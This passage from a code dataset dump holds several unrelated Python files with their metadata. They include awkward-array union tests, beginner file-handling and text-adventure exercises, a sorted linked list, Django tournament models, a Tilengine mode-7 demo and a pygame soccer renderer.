print(\"Corrupt\")\n elif veri(y) == 1:\n print(\"OK\")\n else:\n fil,col= veri(y)\n print(\"Change bit (\"+str(fil)+\",\"+str(col)+\")\")\n tam = int(stdin.readline())\nmain()\n","sub_path":"ejercicios/Strings/paridad.py","file_name":"paridad.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"993894","text":"# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE\n\nimport pytest # noqa: F401\nimport numpy as np # noqa: F401\nimport awkward as ak # noqa: F401\n\n\ndef test_getitem():\n content0 = ak.from_iter([[1.1, 2.2, 3.3], [], [4.4, 5.5]], highlevel=False)\n content1 = ak.from_iter([\"one\", \"two\", \"three\", \"four\", \"five\"], highlevel=False)\n tags = ak.layout.Index8(np.array([1, 1, 0, 0, 1, 0, 1, 1], dtype=np.int8))\n\n assert np.asarray(ak.layout.UnionArray8_32.regular_index(tags)).tolist() == [\n 0,\n 1,\n 0,\n 1,\n 2,\n 2,\n 3,\n 4,\n ]\n assert np.asarray(ak.layout.UnionArray8_32.regular_index(tags)).dtype == np.dtype(\n np.int32\n )\n assert np.asarray(ak.layout.UnionArray8_U32.regular_index(tags)).tolist() == [\n 0,\n 1,\n 0,\n 1,\n 2,\n 2,\n 3,\n 4,\n ]\n assert np.asarray(ak.layout.UnionArray8_U32.regular_index(tags)).dtype == np.dtype(\n np.uint32\n )\n assert np.asarray(ak.layout.UnionArray8_64.regular_index(tags)).tolist() == [\n 0,\n 1,\n 0,\n 1,\n 2,\n 2,\n 3,\n 4,\n ]\n assert np.asarray(ak.layout.UnionArray8_64.regular_index(tags)).dtype == np.dtype(\n np.int64\n )\n\n 
index = ak.layout.Index32(np.array([0, 1, 0, 1, 2, 2, 4, 3], dtype=np.int32))\n array = ak.layout.UnionArray8_32(tags, index, [content0, content1])\n assert np.asarray(array.tags).tolist() == [1, 1, 0, 0, 1, 0, 1, 1]\n assert np.asarray(array.tags).dtype == np.dtype(np.int8)\n assert np.asarray(array.index).tolist() == [0, 1, 0, 1, 2, 2, 4, 3]\n assert np.asarray(array.index).dtype == np.dtype(np.int32)\n assert type(array.contents) is list\n assert [ak.to_list(x) for x in array.contents] == [\n [[1.1, 2.2, 3.3], [], [4.4, 5.5]],\n [\"one\", \"two\", \"three\", \"four\", \"five\"],\n ]\n assert array.numcontents == 2\n assert ak.to_list(array.content(0)) == [[1.1, 2.2, 3.3], [], [4.4, 5.5]]\n assert ak.to_list(array.content(1)) == [\"one\", \"two\", \"three\", \"four\", \"five\"]\n assert ak.to_list(array.project(0)) == [[1.1, 2.2, 3.3], [], [4.4, 5.5]]\n assert ak.to_list(array.project(1)) == [\"one\", \"two\", \"three\", \"five\", \"four\"]\n repr(array)\n\n assert ak.to_list(array[0]) == \"one\"\n assert ak.to_list(array[1]) == \"two\"\n assert ak.to_list(array[2]) == [1.1, 2.2, 3.3]\n assert ak.to_list(array[3]) == []\n assert ak.to_list(array[4]) == \"three\"\n assert ak.to_list(array[5]) == [4.4, 5.5]\n assert ak.to_list(array[6]) == \"five\"\n assert ak.to_list(array[7]) == \"four\"\n\n assert ak.to_list(array) == [\n \"one\",\n \"two\",\n [1.1, 2.2, 3.3],\n [],\n \"three\",\n [4.4, 5.5],\n \"five\",\n \"four\",\n ]\n assert ak.to_list(array[1:-1]) == [\n \"two\",\n [1.1, 2.2, 3.3],\n [],\n \"three\",\n [4.4, 5.5],\n \"five\",\n ]\n assert ak.to_list(array[2:-2]) == [[1.1, 2.2, 3.3], [], \"three\", [4.4, 5.5]]\n assert ak.to_list(array[::2]) == [\"one\", [1.1, 2.2, 3.3], \"three\", \"five\"]\n assert ak.to_list(array[::2, 1:]) == [\"ne\", [2.2, 3.3], \"hree\", \"ive\"]\n assert ak.to_list(array[:, :-1]) == [\n \"on\",\n \"tw\",\n [1.1, 2.2],\n [],\n \"thre\",\n [4.4],\n \"fiv\",\n \"fou\",\n ]\n\n content2 = ak.from_iter(\n [{\"x\": 0, \"y\": []}, {\"x\": 1, \"y\": [1.1]}, {\"x\": 2, \"y\": [1.1, 2.2]}],\n highlevel=False,\n )\n content3 = ak.from_iter(\n [\n {\"x\": 0.0, \"y\": \"zero\", \"z\": False},\n {\"x\": 1.1, \"y\": \"one\", \"z\": True},\n {\"x\": 2.2, \"y\": \"two\", \"z\": False},\n {\"x\": 3.3, \"y\": \"three\", \"z\": True},\n {\"x\": 4.4, \"y\": \"four\", \"z\": False},\n ],\n highlevel=False,\n )\n array2 = ak.layout.UnionArray8_32(tags, index, [content2, content3])\n assert ak.to_list(array2) == [\n {\"x\": 0.0, \"y\": \"zero\", \"z\": False},\n {\"x\": 1.1, \"y\": \"one\", \"z\": True},\n {\"x\": 0, \"y\": []},\n {\"x\": 1, \"y\": [1.1]},\n {\"x\": 2.2, \"y\": \"two\", \"z\": False},\n {\"x\": 2, \"y\": [1.1, 2.2]},\n {\"x\": 4.4, \"y\": \"four\", \"z\": False},\n {\"x\": 3.3, \"y\": \"three\", \"z\": True},\n ]\n assert ak.to_list(array2[\"x\"]) == [0.0, 1.1, 0, 1, 2.2, 2, 4.4, 3.3]\n assert ak.to_list(array2[\"y\"]) == [\n \"zero\",\n \"one\",\n [],\n [1.1],\n \"two\",\n [1.1, 2.2],\n \"four\",\n \"three\",\n ]\n assert ak.to_list(array2[:, \"y\", 1:]) == [\n \"ero\",\n \"ne\",\n [],\n [],\n \"wo\",\n [2.2],\n \"our\",\n \"hree\",\n ]\n assert ak.to_list(array2[\"y\", :, 1:]) == [\n \"ero\",\n \"ne\",\n [],\n [],\n \"wo\",\n [2.2],\n \"our\",\n \"hree\",\n ]\n with pytest.raises(ValueError) as err:\n array2[:, 1:, \"y\"]\n assert str(err.value).startswith(\"in NumpyArray, too many dimensions in slice\")\n with pytest.raises(ValueError) as err:\n array2[\"z\"]\n assert str(err.value).startswith('key \"z\" does not exist (not in record)')\n\n array3 = 
ak.layout.UnionArray8_32(tags, index, [content3, content2])\n array4 = ak.layout.UnionArray8_32(\n tags, index, [content0, content1, content2, content3]\n )\n assert set(content2.keys()) == {\"x\", \"y\"}\n assert set(content3.keys()) == {\"x\", \"y\", \"z\"}\n assert set(array2.keys()) == {\"x\", \"y\"}\n assert set(array3.keys()) == {\"x\", \"y\"}\n assert array4.keys() == []\n\n\ndef test_identities():\n content0 = ak.from_iter([[1.1, 2.2, 3.3], [], [4.4, 5.5]], highlevel=False)\n content1 = ak.from_iter([\"one\", \"two\", \"three\", \"four\", \"five\"], highlevel=False)\n tags = ak.layout.Index8(np.array([1, 1, 0, 0, 1, 0, 1, 1], dtype=np.int8))\n index = ak.layout.Index32(np.array([0, 1, 0, 1, 2, 2, 4, 3], dtype=np.int32))\n array = ak.layout.UnionArray8_32(tags, index, [content0, content1])\n\n array.setidentities()\n assert np.asarray(array.identities).tolist() == [\n [0],\n [1],\n [2],\n [3],\n [4],\n [5],\n [6],\n [7],\n ]\n assert np.asarray(array.content(0).identities).tolist() == [[2], [3], [5]]\n assert np.asarray(array.content(1).identities).tolist() == [[0], [1], [4], [7], [6]]\n\n\ndef test_fromiter():\n builder = ak.layout.ArrayBuilder()\n\n builder.integer(0)\n builder.integer(1)\n builder.integer(2)\n builder.beginlist()\n builder.endlist()\n builder.beginlist()\n builder.real(1.1)\n builder.endlist()\n builder.beginlist()\n builder.real(1.1)\n builder.real(2.2)\n builder.endlist()\n builder.beginlist()\n builder.real(1.1)\n builder.real(2.2)\n builder.real(3.3)\n builder.endlist()\n\n assert ak.to_list(builder.snapshot()) == [\n 0,\n 1,\n 2,\n [],\n [1.1],\n [1.1, 2.2],\n [1.1, 2.2, 3.3],\n ]\n\n assert ak.to_list(\n ak.from_iter([0, 1, 2, [], [1.1], [1.1, 2.2], [1.1, 2.2, 3.3]])\n ) == [0, 1, 2, [], [1.1], [1.1, 2.2], [1.1, 2.2, 3.3]]\n assert ak.to_list(\n ak.from_iter(\n [\n 0,\n 1,\n 2,\n [],\n \"zero\",\n [1.1],\n \"one\",\n [1.1, 2.2],\n \"two\",\n [1.1, 2.2, 3.3],\n \"three\",\n ]\n )\n ) == [\n 0,\n 1,\n 2,\n [],\n \"zero\",\n [1.1],\n \"one\",\n [1.1, 2.2],\n \"two\",\n [1.1, 2.2, 3.3],\n \"three\",\n ]\n assert ak.to_list(\n ak.from_json(\n '[0, 1, 2, [], \"zero\", [1.1], \"one\", [1.1, 2.2], \"two\", [1.1, 2.2, 3.3], \"three\"]'\n )\n ) == [\n 0,\n 1,\n 2,\n [],\n \"zero\",\n [1.1],\n \"one\",\n [1.1, 2.2],\n \"two\",\n [1.1, 2.2, 3.3],\n \"three\",\n ]\n assert (\n ak.to_json(\n ak.from_json(\n '[0,1,2,[],\"zero\",[1.1],\"one\",[1.1,2.2],\"two\",[1.1,2.2,3.3],\"three\"]'\n )\n )\n == '[0,1,2,[],\"zero\",[1.1],\"one\",[1.1,2.2],\"two\",[1.1,2.2,3.3],\"three\"]'\n )\n","sub_path":"tests/test_0084-start-unionarray.py","file_name":"test_0084-start-unionarray.py","file_ext":"py","file_size_in_byte":8197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"240249425","text":"import codecs\n'''\nFileObject = open('data.txt' , 'r' , encoding='utf-8')\ncontent = 'Process finished with exit code 1'\nprint(content , file=open('data.txt' , 'a' , encoding='utf-8'))\nFileObject.close()\n'''\n\n'''\nExercise 902\n讀取read.txt,內容為整數,用空格分開\n將所有整數加總,並印出加總結果\n\nFileObject = open('read_1.txt' , 'r' , encoding='utf-8')\nInputFile = FileObject.read()\nFileObject.close()\n\n#將InputFile的內容,依空格為單位進行分割\nnum = InputFile.split(' ')\n#預設總和為0\nSum = 0\n\n#加總\nfor i in range(0,len(num)):\n print(num[i] , end=' ')\n Sum = Sum + eval(num[i])\n\nprint('\\n總和為: ' , Sum)\n'''\n\n'''\nExercise 904\n讀取read.txt,內容為名字、身高、體重,用空格分開\n印出所有人的平均身高、平均體重、最高者、最重者\n*浮點數到小數點第2位\n\nFileObject = open('read_2.txt' , 'r' , encoding='utf-8')\nInputFile = 
FileObject.read()\nFileObject.close()\n\n#===============================\n#Declare variables\n#===============================\n#Everyone's data\nData = []\n#Name list\nName = []\n#Height list\nHeight = []\n#Weight list\nWeight = []\n#Tallest height\nMax_H = 0\n#Heaviest weight\nMax_W = 0\n\n#Convert newline characters to spaces\nLine = InputFile.replace('\\n',' ')\n#Split the contents of InputFile on spaces\nLine = Line.split(' ')\n\n#Group the split data three at a time (name, height, weight)\nfor i in range(0 , len(Line) , 3):\n #Store one group of data in Temp\n Temp = [Line[i] , eval(Line[i+1]) , eval(Line[i+2])]\n #Append Temp to Data as one group\n Data.append(Temp)\n\nprint(Data , '\\n')\n\n#Names\nfor i in range(0 , len(Data)):\n Name.append(Data[i][0])\n#Heights\nfor i in range(0 , len(Data)):\n Height.append(Data[i][1])\n#Tallest\nMax_H = max(Height)\n#Weights\nfor i in range(0 , len(Data)):\n Weight.append(Data[i][2])\n#Heaviest\nMax_W = max(Weight)\n\n\n#Average height\nprint('Average Height: {:.2f}' .format(sum(Height)/ len(Height)))\n\n#Average weight\nprint('Average Weight: {:.2f}' .format(sum(Weight) / len(Weight)))\n\n#Tallest person\nprint('Tallest: ' , Name[Height.index(Max_H)] , Max_H)\n\n#Heaviest person\nprint('Heaviest: ' , Name[Weight.index(Max_W)] , Max_W)\n\n'''\n\n'''\nExercise 906\nInput: file name read_3.txt, string s1, string s2\nReplace string s1 in read_3.txt with string s2\n\nFileName = input('FileName: ')\ns1 = input('String 1: ')\ns2 = input('String 2: ')\n\nFileObject = open(FileName , 'r' , encoding='utf-8')\nInputFile = FileObject.read()\nFileObject.close()\n\n#Replace string s1 in read_3.txt with string s2\nOutFile = InputFile.replace(s1 , s2)\n\n#Write the output file\nprint(OutFile , file=open(FileName , 'w' , encoding='utf-8'))\n'''\n\n'''\nExercise 908\nInput: file name read_4.txt and an occurrence count (words separated by spaces)\nOutput: the words matching that occurrence count, sorted by first letter\n\nex.\nInput\nread_4.txt\n3\n\nOutput\na\nis\nprogram\n\n\n#===============================\n#Declare variables\n#===============================\n#List of words and their occurrence counts\nWord = []\n#Temporary list holding one word and its occurrence count\nTemp = []\n#Count of identical word occurrences, at least 1\nTemp_Number = 1\n#Words matching the requested occurrence count\nOut_Word = []\n#Whether any word matches the occurrence count, true: match found, false: no match\nAppear = False\n\n\nFileName = input('FileName: ')\nNumber = eval(input('Occurrence count: '))\n\nFileObject = open(FileName , 'r' , encoding='utf-8')\nInputFile = FileObject.read()\nFileObject.close()\n\n#Convert newline characters to spaces\nLine = InputFile.replace('\\n',' ')\n#Split the contents of InputFile on spaces\nLine = Line.split(' ')\n\nprint(Line)\n\n#Count how many times each word appears\nfor i in range(0 , len(Line) , 1):\n #If Line[i]=='@', this word was already counted earlier, so skip it\n if(Line[i]=='@'):continue\n #Compare the words one by one\n for j in range(i+1 , len(Line) , 1):\n #If an identical word is found\n if(Line[i] == Line[j]):\n #Increase the occurrence count by 1\n Temp_Number = Temp_Number + 1\n #Change the word at that position to '@' to mark it as already counted\n Line[j] = '@'\n #Store the word and its count as a list\n Temp = [Line[i] , Temp_Number]\n #Append to Word\n Word.append(Temp)\n #Reset the count to its initial value\n Temp_Number = 1\n\n#Put the words matching the occurrence count into Out_Word\nfor i in range(0 , len(Word)):\n if(Word[i][1] == Number):\n #A matching word exists\n Appear = True\n Temp = Word[i][0]\n Out_Word.append(Temp)\n\n#Print Out_Word\nif(Appear == True): print(sorted(Out_Word))\nelse: print('No word matches the occurrence count')\n'''\n\n'''\nExercise 910\nRead read_5.dat; row 1 holds the column names, the rows after it hold one person's data each\nOutput the number of boys and girls (0: girl, 1: boy)\n\n學號 姓名 性別 科系\n101 阿明 1 餐旅管理\n202 阿忠 1 資工\n303 小華 0 語文\n404 篠美 0 應英\n505 安凱 1 日文\n\n\n#===============================\n#Declare variables\n#===============================\n#List of everyone's data\nData = []\n#Temporary list for one person's data\nTemp = []\n#Number of boys\nMale_Number = 0\n#Number of girls\nFemale_Number = 0\n\nFileObject = open('read_5.txt' , 'r' )\nInputFile = FileObject.read()\nFileObject.close()\n\n\n#Convert newline characters to spaces\nLine = InputFile.replace('\\n',' ')\n#Split the contents of InputFile on spaces\nLine = Line.split(' ')\n\nprint(Line , '\\n')\n\n#Split the data into one group per person (student id, name, gender, department)\nfor i in range(4 , len(Line) , 4):\n Temp = [eval(Line[i]) , Line[i+1] , eval(Line[i+2]) , Line[i+3]]\n Data.append(Temp);\n\n#Count the people\nfor i in range(0,len(Data)):\n if(Data[i][2] == 0): Female_Number = Female_Number + 1\n else: Male_Number = Male_Number + 1\n\n#Output\nprint('學號', '姓名', '性別', '科系')\n\nfor i in range(0,len(Data)):\n print('{ID} {Name} {Sex} {Department}' .format(ID=Data[i][0],Name=Data[i][1],Sex=Data[i][2],Department=Data[i][3]))\n\nprint()\nprint('Female_Number: ',Female_Number)\nprint('Male_Number: ' , Male_Number)\n'''\n\n'''\n#Read Windows text, the default format is ANSI\n\n# coding=MS950\n#Open the file (mode: read r)\nFileObject = open('read_5.txt' , 'r' , encoding='ANSI')\n#Read the file contents\nInputFile = FileObject.read()\n#Print the file contents\nprint(InputFile)\n#Close the file\nFileObject.close()\n'''\n\n'''\nRead a file whose contents are Chinese\nSave the txt as a new file in utf-8 format\n'''\n#Open the file (mode: read r)\nFileObject = open('chinese_read_1.txt' , 'r' , encoding='utf-8')\n#Read the file contents\nInputFile = FileObject.read()\n#Print the file contents\nprint(InputFile)\n#Close the file\nFileObject.close()\n\n'''\nWrite a file whose contents are Chinese\n'''\n#The Chinese string to write\nNewStr = '如何用Python(复制)写入中文txt文件'\n\n#Open the file (mode: write w or append a)\nFileObject = open('chinese_read_1.txt' , 'a' , encoding='utf-8')\n#Write to the file: encode with encode() first, then decode with decode()\nFileObject.write(NewStr.encode('utf-8').decode('utf-8'))\n#Close the file\nFileObject.close()\n\n","sub_path":"Python_Learn/File_inout_test.py","file_name":"File_inout_test.py","file_ext":"py","file_size_in_byte":6898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"431710207","text":"# exercise 32\nthe_count = [1, 2, 9, 4, 5]\nfruits = ['apples', 'oranges', 'pears', 'apricots']\nchange = [1, 'pennies', 2, 'dimes', 3, 'quarters']\n\n# this first kind of for-Loop goes through a list\nfor number in the_count:\n\tprint (\"This is count %d\" % number)\n\n# same as above\nfor fruit in fruits:\n\tprint (\"A fruit of type: %s\" % fruit)\n\n# also we can go through mixed lists too\n# notice we have to use %r since we don't know what's in it\nfor i in change:\n\tprint (\"I got %r\" % i)\n\n# we can also build lists, first start with an empty one\nelements = []\n\n# then use the range function to do 0 to 5 counts\nfor i in range(0, 6):\n\tprint (\"Adding %d to the list.\" % i)\n\t# append is a function that lists understand\n\telements.append(i)\n\n# now we can print them out too\nfor i in elements:\n\tprint (\"Element was: %d\" % i)\n\n# exercise 33\ni = 0\nnumbers = []\n\nwhile i < 6:\n\tprint (\"At the top i is %d\" % i)\n\tnumbers.append(i)\n\n\ti = i + 1\n\tprint (\"Numbers now: \", numbers)\n\tprint (\"At the bottom i is %d\" % i)\n\nprint (\"The numbers: \")\n\nfor num in numbers:\n\tprint (num)\n\n# exercise 35\nfrom sys import exit\n\ndef gold_room():\n\tprint(\"This room is full of gold. How much do you take?\")\n\n\tchoice = input(\"> \")\n\tif \"0\" in choice or \"1\" in choice:\n\t\thow_much = int(choice)\n\telse:\n\t\tdead(\"Man, learn to type a number.\")\n\n\tif how_much < 50:\n\t\tprint (\"Nice, you're not greedy, you win!\")\n\t\texit(0)\n\telse:\n\t\tdead(\"You greedy bastard!\")\n\n\ndef bear_room():\n\tprint (\"There is a bear here.\")\n\tprint (\"The bear has a bunch of honey.\")\n\tprint (\"The fat bear is in front of another door.\")\n\tprint (\"How are you going to move the bear?\")\n\tbear_moved = False\n\n\twhile True:\n\t\tchoice = input(\"> \")\n\n\t\tif choice == \"take honey\":\n\t\t\tdead(\"The bear looks at you then slaps your face off.\")\n\t\telif choice == \"taunt bear\" and not bear_moved:\n\t\t\tprint (\"The bear has moved from the door. 
You can go through it now.\")\n\t\t\tbear_moved = True\n\t\telif choice == \"taunt bear\" and bear_moved:\n\t\t\tdead(\"The bear gets pissed off and chews your leg off.\")\n\t\telif choice == \"open door\" and bear_moved:\n\t\t\tgold_room()\n\t\telse:\n\t\t\tprint (\"I got no idea what that means.\")\n\n\ndef cthulhu_room():\n\tprint (\"Here you see the great evil Cthulhu.\")\n\tprint (\"He, it, whatever stares at you and you go insane.\")\n\tprint (\"Do you flee for your life or eat your head?\")\n\n\tchoice = input(\"> \")\n\n\tif \"flee\" in choice:\n\t\tstart()\n\telif \"head\" in choice:\n\t\tdead(\"Well that was tasty!\")\n\telse:\n\t\tcthulhu_room()\n\n\ndef dead(why):\n\tprint (why, \"Good job!\")\n\texit(0)\n\ndef start():\n\tprint (\"You are in a dark room.\")\n\tprint (\"There is a door to your right and left.\")\n\tprint (\"Which one do you take?\")\n\n\tchoice = input(\"> \")\n\n\tif choice == \"left\":\n\t\tbear_room()\n\telif choice == \"right\":\n\t\tcthulhu_room()\n\telse:\n\t\tdead(\"You stumble around the room until you starve.\")\n\n\nstart()\n\n# doesn't work correctly\n# choice = input(\"> \")\n\n# if \"0\" in choice or \"1\" in choice:\n# \ttemp = int(choice)\n# \tprint (\"blq blq blq\")\n# else:\n# \tprint (\"Man, learn to type a number.\")\n\n# exercise 38\nten_things = \"Apples Oranges Crows Telephone Light Sugar\"\n\nprint (\"Wait there are not 10 things in that list. Let's fix that.\")\n\nstuff = ten_things.split(' ')\nmore_stuff = [\"Day\", \"Night\", \"Song\", \"Frisbee\", \"Corn\", \"Banana\", \"Girl\", \"Boy\"]\n\nwhile len(stuff) != 10:\n\tnext_one = more_stuff.pop()\n\tprint (\"Adding: \", next_one)\n\tstuff.append(next_one)\n\tprint (\"There are %d items now.\" % len(stuff))\n\nprint (\"There we go: \", stuff)\n\nprint (\"Let's do some things with stuff.\")\n\nprint (stuff[1])\nprint (stuff[-1])\nprint (stuff.pop())\nprint (' '.join(stuff))\nprint ('#'.join(stuff[3:5]))\nprint (\"petar\".join(stuff))\nprint (stuff)\nprint (stuff[-2])","sub_path":"python/Learn-Python-The-Hard-Way/exercises27to38.py","file_name":"exercises27to38.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"419995157","text":"class Node:\r\n def __init__(self, value):\r\n self.value = value\r\n self.next = None\r\n\r\n\r\nclass SortedLinkedList:\r\n def __init__(self):\r\n self.head = None\r\n\r\n def insert(self, value):\r\n new_node = Node(value)\r\n if not self.head:\r\n self.head = new_node\r\n elif self.head.value >= new_node.value:\r\n new_node.next = self.head\r\n self.head = new_node\r\n else:\r\n current = self.head\r\n while current.next and current.next.value < new_node.value:\r\n current = current.next\r\n new_node.next = current.next\r\n current.next = new_node\r\n\r\n def display(self):\r\n temp = self.head\r\n while temp:\r\n print(temp.value, end=' ')\r\n temp = temp.next\r\n\r\n\r\nllist = SortedLinkedList()\r\nllist.insert(5)\r\nllist.insert(10)\r\nllist.insert(7)\r\nllist.insert(3)\r\nllist.insert(1)\r\nllist.insert(9)\r\nllist.display()\r\n","sub_path":"sorted_linked_list.py","file_name":"sorted_linked_list.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"537637174","text":"from django.db import models\nfrom django.forms import ModelForm\nfrom django import forms\n\nclass Fighter(models.Model):\n alias = models.CharField('Nombre', max_length=15, primary_key=True) \n 
force = models.PositiveIntegerField('Fuerza', default=4)\n skill = models.PositiveIntegerField('Habilidad', default=3)\n resistance = models.PositiveIntegerField('Resistencia', default=3)\n\n def __str__(self):\n return self.alias\n\n class Meta:\n verbose_name = 'Luchador'\n verbose_name_plural = 'Luchadores'\n\nTOURNAMENT_CATEGORIES = (\n (0, 'Pluma'),\n (1, 'Tigre'),\n (2, 'León')\n)\n\nclass Tournament(models.Model):\n name = models.CharField('Nombre', max_length=150, primary_key=True)\n start_date = models.DateTimeField('Hora inicio')\n finish_date = models.DateTimeField('Hora final')\n fighter_count = models.IntegerField('Nº Jugadores')\n category = models.IntegerField('Categoria', choices=TOURNAMENT_CATEGORIES, default=0)\n dfighters = models.ManyToManyField(Fighter, verbose_name='Luchadores')\n\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Torneo'\n verbose_name_plural = 'Torneos'\n\n\nclass Disputedtournament(models.Model):\n #PROTECT: the referenced Tournament cannot be deleted without first deleting the disputed tournament\n name = models.OneToOneField(Tournament,on_delete=models.PROTECT,primary_key=True)\n rounds = models.IntegerField('Nº Rondas por combate')\n \n \n \n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Torneo Disputado'\n verbose_name_plural = 'Torneos Disputados'\n\n\n \n\n#---------------FORMS---------------------------------------------\n\n\n\nclass DateInput(forms.DateInput):\n input_type = 'date'\n\n\nclass TournamentForm(ModelForm):\n class Meta:\n \n start_date = forms.DateTimeField()\n model = Tournament\n fields = '__all__'\n widgets = {\n 'start_date': DateInput(),\n 'finish_date': DateInput(),\n 'dfighters': forms.CheckboxSelectMultiple() \n }\n \n\nclass FighterForm(ModelForm):\n class Meta:\n model = Fighter\n fields = '__all__'\n\n\nclass DisputedForm(ModelForm):\n class Meta:\n model = Disputedtournament\n fields = ('name', 'rounds')","sub_path":"mysite/main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"412204478","text":"# Python Crash Course: A Hands-On, Project-Based Introduction To Programming\n#\n# Name: Mark Lester Apuya\n# Date: 05/29/2021\n#\n# Chapter 7: User Input and While Loops\n#\n# Exercise 7.6 Three Exits:\n# Write different versions of either Exercise 7-4 or Exercise 7-5 that do \n# each of the following at least once:\n#\n# • Use a conditional test in the while statement to stop the loop.\n# • Use an active variable to control how long the loop runs.\n# • Use a break statement to exit the loop when the user enters a 'quit' value.\n\n# Break statement\n# pizza_topping.py\nmessage = \"\\nWhat toppings would you like on your pizza?\"\nmessage += \"\\nEnter 'quit' to end the program. 
\"\n\nwhile True:\n toppings = input(message)\n\n if toppings == 'quit':\n break\n else:\n print(toppings)","sub_path":"Part_1_Basics/Chapter_7_User_Input_and_while_Loops/three_exits3.py","file_name":"three_exits3.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"557502756","text":"class Solution:\n def buddyStrings(self, A: str, B: str) -> bool:\n if len(A)!=len(B):\n return False\n \n if A==B and len(set(A))= 24:\n\t\tscale = lerp (line, 24,HEIGHT, MIN_SCALE,MAX_SCALE);\n\t\taffine.sx = scale;\n\t\taffine.sy = scale;\t\t\n\t\ttln.SetLayerTransform (LAYER_BACKGROUND, affine.angle, affine.dx, affine.dy, affine.sx, affine.sy)\n\t\t\ndef SetScale (min,max):\n\t\"\"\"\"Sets the upper (min) and lower (max) scaling factor of the road\"\"\"\n\tglobal MIN_SCALE\n\tglobal MAX_SCALE\n\tMIN_SCALE = min\n\tMAX_SCALE = max\n\t\ndef SetPosition (x,y):\n\t\"\"\"Sets the location of the road\"\"\"\n\tglobal xpos\n\tglobal ypos\n\txpos = x\n\typos = y\n\t\ndef SetAngle (a):\n\t\"\"\"Sets the rotation angle (degrees) of the road\"\"\"\n\tglobal angle\n\tangle = a%360\n\t\ndef SetSpeed (s):\n\t\"\"\"\"Sets the movement speed of the road\"\"\"\n\tglobal speed\n\tspeed = s\n\n# setup engine\ntln.Init (WIDTH, HEIGHT, 2,0,0)\ntln.CreateWindowThread (\"overlay2.bmp\", tln.CWF_S2)\ntln.SetBGColor (0,0,0)\n\n# load resources\ntileset_horizon = tln.LoadTileset (\"track1_bg.tsx\")\ntilemap_horizon = tln.LoadTilemap (\"track1_bg.tmx\", \"Layer 1\")\ntileset_track = tln.LoadTileset (\"track1.tsx\")\ntilemap_track = tln.LoadTilemap (\"track1.tmx\", \"Layer 1\")\n\n# set raster callback\nCB_FUNC_TYPE = CFUNCTYPE (None, c_int)\ncb_func = CB_FUNC_TYPE(raster_callback)\ntln.SetRasterCallback (cb_func)\n","sub_path":"bindings/python/mode7_test.py","file_name":"mode7_test.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"637743139","text":"# Third-party modules\nimport pygame\nimport pygame.locals\n\n# User-defined modules\nfrom pygame_rl.renderer.pygame_renderer import TiledRenderer\nfrom pygame_rl.scenario.soccer.renderer_options import RendererOptions\n\n\nclass Renderer(TiledRenderer):\n \"\"\"Soccer renderer.\n \"\"\"\n # Constants\n title = 'Soccer'\n\n # Environment\n env = None\n\n # Renderer options\n renderer_options = None\n\n # Display state\n display_quitted = False\n\n # TMX objects\n static_overlays = None\n\n # Clock object (pygame.time.Clock())\n clock = None\n\n # Dirty groups (pygame.sprite.RenderUpdates)\n dirty_groups = None\n\n # Previous ball state\n prev_ball_state = None\n\n def __init__(self, map_path, env, renderer_options=None):\n super().__init__(map_path)\n # Save the environment\n self.env = env\n # Use or create the renderer options\n self.renderer_options = renderer_options or RendererOptions()\n\n def load(self):\n # Initialize Pygame\n pygame.display.init()\n pygame.display.set_mode([400, 300])\n pygame.display.set_caption(self.title)\n\n # Initialize the renderer\n super().load()\n\n # Set the screen size\n resolution = super().get_display_size()\n self.screen = pygame.display.set_mode(resolution)\n\n # Get the background\n self.background = super().get_background()\n\n # Get the static overlays\n self.static_overlays = super().get_overlays()\n\n # Initialize previous ball state\n self._init_prev_ball_state()\n\n # Initialize the dirty group\n self._load_dirty_group()\n\n # Blit the background 
to the screen\n self.screen.blit(self.background, [0, 0])\n\n # Update the full display\n if self.renderer_options.show_display:\n pygame.display.flip()\n\n # Create the clock\n self.clock = pygame.time.Clock()\n\n # Close the display if the renderer options is set to disable the\n # display\n if not self.display_quitted and not self.renderer_options.show_display:\n # Replace the screen surface with in-memory surface\n self.screen = self.screen.copy()\n # Close the display\n pygame.display.quit()\n # Prevent from further closing\n self.display_quitted = True\n\n def render(self):\n # Clear the overlays\n self.dirty_groups.clear(self.screen, self.background)\n\n # Update the overlays by the environment state\n self._update_overlay_pos()\n self._update_overlay_visibility()\n\n # Draw the overlays\n dirty = self.dirty_groups.draw(self.screen)\n\n # Update only the dirty surface\n if self.renderer_options.show_display:\n pygame.display.update(dirty)\n\n # Limit the max frames per second\n if self.renderer_options.show_display:\n self.clock.tick(self.renderer_options.max_fps)\n\n # Handle the events\n if self.renderer_options.show_display:\n for event in pygame.event.get():\n # Detect the quit event\n if event.type == pygame.locals.QUIT:\n # Indicate the rendering should stop\n return False\n # Detect the keydown event\n if self.renderer_options.enable_key_events:\n if event.type == pygame.locals.KEYDOWN:\n # Get the agent index of the first player\n team_agent_index = 0\n agent_index = self.env.get_agent_index(\n 'PLAYER', team_agent_index)\n # Prepare the cached action\n cached_action = None\n if event.key == pygame.locals.K_RIGHT:\n cached_action = 'MOVE_RIGHT'\n elif event.key == pygame.locals.K_UP:\n cached_action = 'MOVE_UP'\n elif event.key == pygame.locals.K_LEFT:\n cached_action = 'MOVE_LEFT'\n elif event.key == pygame.locals.K_DOWN:\n cached_action = 'MOVE_DOWN'\n elif event.key == pygame.locals.K_s:\n cached_action = 'STAND'\n # 